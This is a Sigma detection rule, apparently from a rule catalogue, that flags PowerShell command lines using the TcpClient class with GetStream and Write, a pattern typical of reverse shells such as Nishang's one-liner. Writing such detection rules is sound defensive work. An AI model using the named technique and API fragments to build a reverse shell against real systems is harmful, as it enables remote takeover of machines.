Techniques
Sample rules
Potential Powershell ReverseShell Connection
- source: sigma
- technicques:
- t1059
- t1059.001
Description
Detects usage of the “TcpClient” class. Which can be abused to establish remote connections and reverse-shells. As seen used by the Nishang “Invoke-PowerShellTcpOneLine” reverse shell and other.
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains|all:
- ' Net.Sockets.TCPClient'
- .GetStream(
- .Write(
selection_img:
- OriginalFileName:
- PowerShell.EXE
- pwsh.dll
- Image|endswith:
- \powershell.exe
- \pwsh.exe